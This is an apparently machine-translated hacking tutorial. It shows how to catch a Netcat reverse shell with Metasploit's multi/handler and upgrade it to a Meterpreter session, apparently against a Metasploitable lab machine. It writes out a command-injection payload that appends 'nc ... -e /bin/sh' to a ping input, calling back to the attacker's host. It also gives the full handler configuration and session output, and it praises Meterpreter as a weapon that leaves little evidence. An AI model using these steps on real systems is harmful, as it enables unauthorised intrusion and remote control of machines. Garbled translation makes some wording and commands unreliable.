Poping a shell is often a hacker's main target and can be exciting if executed correctly, but sometimes they have their limitations. Metasploit's Meterpreter may not require any introduction, but this powerful, dynamic payload can beat a leg higher than normal shells. To prove this, we'll show you how to put a normal command shell into a meterpreter session.
Shell vs. Meterpreter
A binding shell effectively binds to a specific port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, establishes an active connection between the target computer and the attacking computer, where a listener waits for incoming connections.
Command shells are a great way to really get to grips with the goal, but not always the best option. Typically, they are limited to the privileges of the user who initiated the shell, so the performance associated with root-level access is not always available.
Recommended on Amazon: Metasploit: The Penetration Tester's Guide  The Meterpreter allows us to perform locally executed exploit modules and exploits on the target after the exploit. It uses encrypted communication methods, and nothing is written to disk during operation. This makes it a suitable weapon that leaves little to no evidence. The Meterpreter offers a variety of other features and is highly expandable, making it an excellent addition to any hacker arsenal.
Step 1: Start a Listener
First, start Metasploit. Enter msfconsole in the terminal and we will be greeted by a nice little welcome banner after loading. We will use a great feature of Metasploit, the ability to set up a universal listener that supports a variety of different types of shells. To load the module, type the following:
use exploit / multi / handler
Next, you must specify the listening host and port by using the IP address of our local computer and any port number. We also need to adjust the payload – the versatile reverse TCP shell is an excellent choice.
Set msf5 exploit (multi / handler)> Lhost 172.16.1.100 lhost => 172.16.1.100 msf5 Exploit (Multi / Handler)> Sets port 1234 lport => 1234 msf5 exploit (multi / handler)> set payload linux / x86 / shell / reverse_tcp payload => linux / x86 / shell / reverse_tcp
Enter options at the command prompt to verify that our settings are correct.
msf5 exploit (multi / handler)> options Module Options (Exploit / Multi / Handler): Name Current setting Required description ---- --------------- -------- ----------- Payload options (linux / x86 / shell / reverse_tcp): Name Current setting Required description ---- --------------- -------- ----------- LHOST 172.16.1.100 yes The listening address (an interface can be specified) LPORT 1234 yes The listport Exploit target: ID name - ---- 0 Wildcard Target
It looks like we are good. Enter run to start the handler, and now he is ready to wait for an incoming connection.
msf5 exploit (multi / handler)> run [*] Reverse TCP handler started at 172.16.1.100:1234. [19659017(Step2:GetShellwithNetcat
) Netcat is a powerful network utility that is often used to troubleshoot connectivity issues. However, it can also be used as a backdoor via command shells. We can use this tool together with a command injection injection vulnerability to create a shell and connect to our local computer. If all goes well, the previously set handler catches the shell and we can issue commands.
This vulnerability could allow us to attach system commands to the ping utility input.
127.0.0.1 && nc 172.16.1.100 1234 -e / bin / sh
Here we used the Netcat command to create a shell and connect to our local machine on port 1234:
After a brief moment in the terminal with our handler, we see that a session is open. We can now issue commands such as id and uname -a to verify this.
[*] Send Level (36 bytes) to 172.16.1.102 [*] Command Shell Session 1 opened at 2019-01-29 15:28:28 -0600 (172.16.1.100:1234 -> 172.16.1.102:53462) I would uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data) uname -a Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
Finally we have to start this session with Ctrl-Z in the background of Y for confirmation.
^ Z Background session 1? [y/N] y msf5 Exploit (Multi / Handler)>
Recommended on Amazon: Instant Netcat Starter
Now that we have reached a session on the target, we can do that Modify modest shell to a full meterpreter session. This allows greater flexibility in interacting with the target.
At the command prompt, type session to see all currently open sessions. Below we see the session we opened earlier, along with ID, shell type and connection information.
msf5 exploit (multi / handler)> sessions Active sessions ================= ID Name Type Information Connection - ---- ---- ----------- ---------- 1 shell x86 / linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
The easiest way to convert a regular session into a meter-meter session is to use the flag -u . Issue the session command with the appropriate ID and watch the magic happen.
msf5 exploit (multi / handler)> sessions -u 1 [*] Running & # 39; post / multi / manage / shell_to_meterpreter & # 39; in session (s):  [*] Update the session ID: 1 [*] Start exploit / multi / handler [*] The reverse TCP handler was started at 172.16.1.100:4433 [*] Send Level (914728 bytes) to 172.16.1.102 [*] Meterpreter Session 2 opened at 2019-01-29 15:30:28 -0600 (172.16.1.100:4433 -> 172.16.1.102:42790) [*] Command Memory Progress: 100.00% (773/773 bytes)
It now seems that nothing has happened, but in fact we have a Meterpreter session open in the background - this does not automatically lead us to it. If we issue the command again our new Meterpreter session with the ID 2 will be listed. We can then use the flag -i to interact with it.
msf5 exploit (multi / handler)> sessions -i 2 [*] Start of interaction with 2 ... Meterpreter>
And now we have a Meterpreter shell. However, there is another way to raise a normal shell to a meterpreter session that is similar to the method described above, and to manually use the shell_to_meterpreter post-use module.
To load the shell, type the following:
Use post / multi / manage / shell_to_meterpreter
You only need to use the existing one Specify a session that you want to update. After that we can only display the current settings with the command .
msf5 post (multi / manage / shell_to_meterpreter)> Set Session 1 Session => 1 msf5 post (multi / manage / shell_to_meterpreter)> options Module options (post / multi / manage / shell_to_meterpreter): Name Current setting Required description ---- --------------- -------- ----------- HANDLER true yes Start an exploit / multi / handler to get the connection LHOST No IP address of the host that receives the connection from the payload (tries to detect automatically). LPORT 4433 yes Port for the payload to which a connection is to be made. SESSION 1 yes The session on which this module is to be executed.  Enter run to start it.
msf5 post (multi / manage / shell_to_meterpreter)> run [*] Update Session ID: 1 [*] Start exploit / multi / handler [*] The reverse TCP handler was started at 172.16.1.100:4433 [*] Send Level (914728 bytes) to 172.16.1.102 [*] Meterpreter Session 3 opened at 2019-01-29 15:34:16 -0600 (172.16.1.100:4433 -> 172.16.1.102:59832) [*] Command stager progress: 100.00% (773/773 bytes) [*] Post-module execution completed
Again, the new session opens in the background, so we need to issue the session command to get the correct ID.
msf5 post (multi / manage / shell_to_meterpreter)> sessions Active sessions ================= ID Name Type Information Connection - ---- ---- ----------- ---------- 1 Shell x86 / Linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102) 3 Meterpreter x86 / linux 172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)
We can see that this new meterpreter session has an ID of 3. Now we can interact with her.  msf5 post (multi / manage / shell_to_meterspreter)> sessions -i 3
[*] Start of interaction with 3 ...
We now have a Meterpreter shell, and from here the sky is the limit.
In this tutorial, we learned how to use a normal old command shell and raise it to the Meterpreter status. We used a Netcat shell here, but any other kind of shell should work with this method. The Meterpreter offers a lot of power and control over every target. So go out and continue.